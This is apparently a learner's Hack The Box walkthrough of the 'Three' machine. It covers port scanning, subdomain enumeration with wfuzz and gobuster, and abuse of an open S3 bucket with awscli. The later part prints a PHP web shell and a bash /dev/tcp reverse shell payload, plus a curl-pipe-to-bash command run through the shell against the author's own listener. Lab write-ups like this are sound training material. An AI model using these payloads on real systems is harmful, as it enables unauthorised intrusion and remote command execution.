HTB Three walkthrough
First, we ping the IP address and export it.
Task 1: How many TCP ports are open
Ans: 2
I ran NMAP -sV -vv -T4
Task 2: What is the domain of the email address provided in the “Contact” section of the website?
ans. thetoppers.htb
I went to the website via the IP address provided when I connected to the box. The email provided is mail@thetoppers.htb
Task 3: In the absence of a DNS server, which Linux file can we use to resolve hostnames to IP addresses in order to be able to access the websites that point to those hostnames?
Ans: /etc/hosts
Task 4: Which sub-domain is discovered during further enumeration?
Ans: s3.thetoppers.htb
From the hint, we need to use a tool like wfuzz or ffuf to enumerate. I’ve never used these tools before, so I had to use wfuzz — help to understand the commands that I can run.
A quick search on google for wfuzz enumeration brought up a few websites
- https://viperone.gitbook.io/pentest-everything/everything/everything-web/sub-domain-enumeration
- under wfuzz they have the command
- wfuzz -c -f sub-fighter -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt -u “http://love.htb" -H “Host: FUZZ.love.htb” — hl 125
A quick read through of this revealed that I do not have the wordlist. I need to download the wordlist from
- https://github.com/theMiddleBlue/DNSenum/blob/master/wordlist/subdomains-top1mil-20000.txt
- we can use
- git clone https://github.com/theMiddleBlue/DNSenum/blob/master/wordlist/subdomains-top1mil-20000.txt
- IDK why but the repository could not be found. I had to manually download it and copy it over to my kali linux.
- later I realised that it can be found under /usr/share/SecLists (the S and the L is capitalized), silly me.
wfuzz -c -w subdomains-top1mil-20000.txt -u $ip/FUZZ
- I used this on my first attempt. It only started running after I added the /FUZZ and -c.
- But… I didnt get any hits.
- back to the drawing board.
- I downloaded another wordlist from https://github.com/danielmiessler/SecLists/blob/master/Discovery/DNS/subdomains-top1million-5000.txt and ran the same command again.
I later realized that I was looking for directories instead of subdomains. If we want to look for subdomains, we have the put the fuzz before the ip address.
Eg. FUZZ.thetoppers.htb
wfuzz -c -w /usr/share/SecLists/Discovery/DNS/subdomains-top1million-5000.txt -u http://thetoppers.htb -H “Host:FUZZ.thetoppers.htb”
Idk why but there were still no hits when I ran this again.
I gave up and used gobuster instead of wfuzz. It’s weird how they put it as a hint although the walkthroughs and videos I watched used gobuster instead.
I ran
- gobuster vhost -u http://thetoppers.htb -w /usr/share/SecLists/Discovery/DNS/subdomains-top1million-5000.txt — append-domain
- we need the — append-domain because my gobuster is version 3.4.
and it worked.
Task 5: Which service is running on the discovered sub-domain?
Ans: Amazon s3
Its part of AWS
Task 6: Which command line utility can be used to interact with the service running on the discovered sub-domain?
Ans: awscli
stands for aws command line interface
Task 7: Which command is used to set up the AWS CLI installation?
Ans: aws configure
Task 8: What is the command used by the above utility to list all of the S3 buckets?
Ans: aws s3 ls
Task 9: This server is configured to run files written in what web scripting language?
Ans: php
Submit root flag.
First, I had to install awscli with the command apt install awscli
Next, we have to configure aws with aws configure
- we can set everything to temp
Next, we have to find out about the s3 buckets hosted by the server using the command from task 8.
- aws — endpoint=http://s3.thetoppers.htb s3 ls
We can find out the files listed through the command
- aws — endpoint=http://s3.thetoppers.htb s3 ls s3://thetoppers.htb
helpful link: https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/AWS%20Amazon%20Bucket%20S3
To get the files, we can copy them to a remote bucket. First, we need to create and upload a PHP shell to the s3 bucket.
I created the file using nano shell.php
Inside the file, I put <?php system($_GET[“cmd”]); ?>
- <?php is to specify the language being used
- $_GET is to get information
- [“cmd”] we get our information from the cmd parameter.
- ?> is to close
Next, we need to upload the shell.php to the website. We can do so with the following command
- aws — endpoint=http://s3.thetoppers.htb s3 cp shell.php s3://thetoppers.htb
- cp is to copy/upload shell.php
We can test if it works by going to http://thetoppers.htb/shell.php
We can try to run commands in the URL itself by going to http://thetoppers.htb/shell.php?cmd=whoami
The response from the website verifies that we have code execution.
The next step is to obtain a reverse shell.
STEPS TO OBTAIN A REVERSE SHELL
- Identify the IP address that you are on.
- from ifconfig
- we are looking for the tun0 address, which is the vpn that htb connects to.
- The ip address is 10.10.14.119
2. Create a new file called shell.sh
- the shell must contain a payload
- bash -i >& /dev/tcp/<your ip address>/1337 0>&1
- or you can go to https://www.revshells.com/ and create your own.
3. start a webserver
- python3 -m http.server 8080
4. start a listener
- nc -lvnp 1337
5. run http://thetoppers.htb/shell.php?cmd=curl%2010.10.14.119:8080/shell.sh|bash in the url.
- %20 is the url encoded version of space ( )
- 10.10.14.119 is your own url
- :8080 is the port it is running from.
- shell.sh is the payload that we have created just now.
- | is a pipe function. (ctrl +\)
- bash: take shell.sh and run it in a new bash instance.
6. The listener would have caught something.
In this case, we have access to the shell and we can try to find the root flag from here.
We can look through the directories to find our flag.txt, and voila!